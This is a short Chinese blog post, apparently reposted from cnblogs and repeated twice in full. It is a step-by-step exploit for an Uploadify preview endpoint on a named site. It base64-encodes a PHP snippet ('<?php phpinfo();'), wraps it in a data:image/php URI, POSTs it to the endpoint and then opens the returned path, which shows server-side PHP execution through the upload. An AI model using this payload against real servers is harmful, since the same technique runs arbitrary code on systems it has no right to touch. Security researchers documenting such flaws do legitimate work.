漏洞地址:http://www.sch01ar.com/index.php/api/Uploadify/preview
这样子说明存在漏洞
对 <?php phpinfo(); 进行 base64 编码
构造:
data:image/php;base64,PD9waHAgcGhwaW5mbygpOyA=
通过 post 方式发生数据
返回了结果地址,访问一下
成功
漏洞地址:http://www.sch01ar.com/index.php/api/Uploadify/preview
这样子说明存在漏洞
对 <?php phpinfo(); 进行 base64 编码
构造:
data:image/php;base64,PD9waHAgcGhwaW5mbygpOyA=
通过 post 方式发生数据
返回了结果地址,访问一下
成功
转载于:https://www.cnblogs.com/sch01ar/p/9565622.html